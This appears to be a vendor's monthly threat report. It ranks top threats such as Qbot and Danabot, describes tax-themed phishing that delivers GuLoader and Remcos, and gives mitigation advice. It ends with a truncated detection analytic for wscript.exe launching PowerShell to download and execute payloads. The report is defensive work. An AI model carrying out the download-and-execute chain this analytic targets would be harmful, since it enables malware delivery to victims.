⬆ = trending up from previous month
⬇= trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
Observations on trending threats
Qbot—ranked as last year’s number 1 threat in our newly released Threat Detection Report—also takes the number 1 spot in this month’s top 10 after a very active February. We observed Qbot being delivered by multiple affiliate groups that act as initial access brokers, TA577 and TA570 in particular. You’ll see both these threats on our top 10 list this month, with TA577 at number 3 and TA570 tied for 6 with Impacket and Gamarue.
A change in our threat tracking led to a newcomer in the top 10. Coming in at number 4, Dock2Master is a threat that we track as a precursor to Shlayer. In the past, we included it in Shlayer activity, but now we are tracking it separately since we frequently see only Dock2Master with no progression to Shlayer. Dock2Master is macOS fraud activity with a primary goal of showing ads to users or redirecting users to the Dock2Master site.
Our other newcomer to the top 10 list, coming in at number 9, is Danabot. Danabot is a modular banking trojan that saw increased use in February 2023.
Tax-themed phishing emails delivering GuLoader
On February 28, we published an insight detailing the ways adversaries take advantage of tax season to make their phishing campaigns more effective. We saw a specific example last month, with tax-themed phishing emails delivering GuLoader. GuLoader is a malicious downloader that adversaries use to distribute shellcode and deliver follow-on payloads.
In February, we saw Remcos delivered as the payload following GuLoader. Remcos is a remote access tool (RAT) that adversaries use to gain persistent remote access to a victim’s endpoint. After Remcos is successfully installed, adversaries can choose from a number of options, including surveilling the victim system, downloading additional malware, and sending host data back to a command and control (C2) server.
We encourage organizations to make users aware of the specific risk of malware delivery via fake tax and financial documents. Users should be wary of unexpected tax-related emails with attachments, especially those purporting to be from the IRS. If a user opens the phishing attachment, one way to mitigate malicious scripts is to create a Group Policy Object (GPO) to change the default behavior of commonly misused script extensions, making them behave like benign text files that open in Notepad and do not automatically execute.
For more information on this activity, including detailed guidance to create a GPO to change script behavior, see the Intelligence Insight.
wscript.exe launching PowerShell
The following detection analytic will identify a script—
wscript.exe in this case—launching PowerShell to download and execute a payload. Malicious phishing attachments, including GuLoader attachments, can leverage
wscript.exe to load and execute malicious PowerShell commands, ultimately downloading and executing staged payloads if not detected.
parent_process == (
process == (